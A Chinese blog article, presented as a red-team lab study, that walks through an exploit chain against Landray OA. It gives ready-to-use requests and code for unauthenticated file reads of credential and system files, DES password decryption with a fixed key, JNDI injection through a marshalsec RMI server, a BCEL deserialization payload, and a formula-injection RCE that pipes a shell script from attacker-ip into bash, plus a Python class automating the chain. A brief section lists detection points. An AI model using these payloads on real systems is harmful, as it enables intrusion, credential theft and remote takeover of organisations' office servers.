当前位置：首页 > article >正文

从攻击者视角复盘：一次蓝凌OA漏洞利用的完整链条与工具化实践（附环境搭建指南）

article 2026/4/21 10:18:12

蓝凌OA安全测试全链路解析从信息收集到RCE的实战沙箱构建当企业办公自动化系统成为攻击者的跳板时安全研究人员需要比黑客更早发现漏洞链中的薄弱环节。蓝凌OA作为国内广泛使用的协同办公平台其多个历史漏洞的组合利用可以形成完整的攻击路径。本文将采用红队视角在封闭实验环境中还原从指纹识别到远程代码执行的全过程技术细节。1. 实验环境构建与基础信息收集搭建安全的测试环境是研究漏洞利用链的首要条件。推荐使用VMware Workstation Pro 17配合NAT网络模式创建隔离的虚拟网络环境。蓝凌OA的测试版本建议选择EKP 9.0至9.5之间的历史版本这些版本包含我们需要研究的典型漏洞特征。环境准备清单VMware ESXi 6.7或Workstation 16CentOS 7.9最小化安装JDK 1.8u202注意避免使用251以上版本MySQL 5.7.36蓝凌OA安装包建议使用官方试用版指纹识别是攻击链的起点通过以下HTTP特征可以快速确认蓝凌OA版本GET /scripts/ekp.js HTTP/1.1 Host: target.com # 响应头中的Server字段通常包含Landray-EOMP # ekp.js文件中的版本注释会暴露具体版本号2. 初始访问敏感信息泄露漏洞利用信息收集阶段最有效的突破口往往是任意文件读取漏洞。蓝凌OA的custom.jsp接口存在未授权访问风险允许攻击者获取系统敏感文件。这个环节需要配合Burp Suite等工具进行精细化操作。典型利用流程使用Repeater模块构造特殊POST请求通过file协议读取WEB-INF目录下的配置文件提取数据库连接信息和加密凭证关键请求示例POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: 192.168.1.100 Content-Type: application/json {body:{file:file:///WEB-INF/KmssConfig/admin.properties}}表常见可读取的关键配置文件文件路径信息价值/WEB-INF/KmssConfig/admin.properties后台管理密码(DES加密)/WEB-INF/classes/ekp.properties数据库连接配置/etc/passwd系统用户信息/proc/self/environ环境变量信息注意实际测试中建议先读取/etc/hosts等非关键文件验证漏洞有效性避免触发安全告警3. 权限提升后台认证绕过与JNDI注入获取加密的管理员密码后需要破解DES加密的凭证。蓝凌OA早期版本使用固定密钥kmssAdminKey可通过以下Python脚本快速解密from Crypto.Cipher import DES import base64 def decrypt(encrypted): cipher DES.new(bkmssAdminKey, DES.MODE_ECB) decrypted cipher.decrypt(base64.b64decode(encrypted)) return decrypted.rstrip(b\x00).decode() # 示例解密从admin.properties获取的密码 print(decrypt(X02xY1F5T3M))成功登录admin.do后台后可利用测试数据库连接功能实施JNDI注入攻击。这个阶段需要搭建RMI服务配合恶意类加载# 使用marshalsec快速启动RMI服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer \ http://attacker-ip:8000/#Exploit 1099 # 恶意类编译要求保持Java 1.7兼容性 javac -source 1.7 -target 1.7 Exploit.java攻击请求示例POST /admin.do HTTP/1.1 Content-Type: application/x-www-form-urlencoded methodtestDbConndatasourcermi://attacker-ip:1099/Exploit4. 持久化控制反序列化漏洞组合利用获得初步执行权限后攻击者通常会寻求更稳定的控制方式。蓝凌OA的sysSearchMain.do接口存在XML反序列化漏洞配合BCEL编码可以实现任意代码执行。BCEL利用链构建步骤使用BCELCode工具将恶意类转换为BCEL格式构造包含BCEL payload的XML结构通过文件写入或直接请求触发漏洞典型攻击流程// 生成BCEL编码的示例 String bcelCode BCELEncoder.encode(Exploit.class); String payload javavoid class\com.sun.org.apache.bcel.internal.util.ClassLoader\ void method\loadClass\string$$BCEL$$ bcelCode /string void method\newInstance\/void/void/void/java;公式编辑器漏洞提供了另一种执行路径通过脚本参数注入可直接执行系统命令POST /sys/common/datajson.jsp HTTP/1.1 Content-Type: application/x-www-form-urlencoded s_beansysFormulaValidateByJSscriptjava.lang.Runtime.getRuntime().exec(curl http://attacker-ip/shell.sh|bash);5. 工具化整合与防御检测建议成熟的攻击者会将离散的漏洞利用过程工具化。基于Python的OA-EXPTOOL项目展示了如何将各个漏洞整合成自动化攻击链class LandrayExploit: def file_read(self, url, file_path): payload {body:{file:ffile://{file_path}}} return requests.post(f{url}/custom.jsp, jsonpayload).text def jndi_inject(self, url, rmi_server): params {method:testDbConn, datasource:frmi://{rmi_server}/Exploit} return requests.post(f{url}/admin.do, dataparams).status_code防御方应当关注以下关键检测点监控对custom.jsp的异常POST请求分析admin.do接口的测试连接行为建立XMLDecoder调用的安全审计规则限制公式解释器的脚本执行权限在实验环境测试时建议使用tcpdump记录所有网络流量配合ELK堆栈构建行为分析基线。每次测试后使用虚拟机快照还原状态确保每次实验的纯净度。

从攻击者视角复盘：一次蓝凌OA漏洞利用的完整链条与工具化实践（附环境搭建指南）

相关文章：

从攻击者视角复盘：一次蓝凌OA漏洞利用的完整链条与工具化实践（附环境搭建指南）

pass 那么fail也要写？还是不需要写，默认就是失败的？

3分钟上手！Revelation光影包：打造电影级Minecraft画面的终极指南

别再傻傻存多张图了！用MinIO和.NET Core实现按需生成缩略图，省下90%存储空间

为什么 persist 属性不行？

从 CMS 到 ZGC，JVM 是如何将停顿时间压缩到 1 毫秒的？

别再被‘kernel source tree not found’卡住：一份给Linux新手的RPM包依赖关系排查指南

Qwen3-4B-Thinking生产环境：日志异常检测+根因分析自动化Pipeline构建

Pymol科研绘图：从AlphaFold预测结构到发表级图片，我的完整工作流分享

nli-MiniLM2-L6-H768效果展示：英文文本对蕴含关系打分真实案例集

别再死记硬背了！用Python+Qiskit动手模拟RX、RY、RZ旋转门（附代码）

3分钟掌握中兴光猫终极管理工具：zteOnu工厂模式一键开启指南

从实验室到田间：FDR土壤水分传感器选型、部署与数据解读避坑指南

告别Facebook WDA！2024年用Appium官方版搭建iOS自动化测试环境（附Xcode 15+避坑指南）

魔兽争霸III终极增强插件WarcraftHelper：5分钟免费解锁完整游戏体验

VSCode + Clangd：打造Linux内核与嵌入式开发的智能代码导航环境

HTTrack网站镜像工具：如何高效构建离线浏览环境的完整指南

Windows Cleaner终极指南：3分钟解决C盘爆红，让电脑重获新生！

AI Agent Harness Engineering 的离线能力：断网场景下的降级策略

ElementUI分页组件el-pagination保姆级配置教程：从数据绑定到独立封装子组件

还在头疼推客管理？直接换云微推客系统

nli-distilroberta-base惊艳案例：处理长难句、否定嵌套、指代消解等复杂逻辑场景

别再傻傻分不清了！嵌入式开发中EEPROM和FLASH选型实战指南（含W25Q64/AT24C02案例）

解密Qwen3.5-397B-A17B：397B总参+17B激活的能效平衡之道

在Vivado里用Verilog驱动N25Q128 SPI Flash，我踩过的两个坑（STARTUPE2原语与IOBUF调试）

Nunchaku FLUX.1 CustomV3部署案例：高校AI艺术实验室本地化部署实施纪要

微信支付V3批量转账接口踩坑实录：从签名验签到结果回调的完整避坑指南

QQ空间导出助手：一键永久备份你的青春记忆

414.7亿原子破世界纪录：国产万卡超集群×科学软件，突破AI4S新边界

从不起振到波形完美：一次搞定无源晶振电路设计的那些坑（实测负阻/ESR/驱动电平）